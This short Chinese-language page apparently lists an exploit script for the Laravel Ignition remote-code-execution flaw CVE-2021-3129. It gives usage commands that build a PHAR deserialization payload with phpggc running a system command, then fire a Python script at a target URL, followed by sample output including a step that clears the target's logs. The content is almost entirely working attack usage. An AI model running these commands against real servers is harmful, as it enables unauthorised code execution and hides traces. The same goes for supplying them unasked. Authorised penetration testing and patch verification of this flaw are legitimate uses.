laravel漏洞
漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce
用法
$ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
-----------
2021-09-11 10:18:54
3KB
Python
1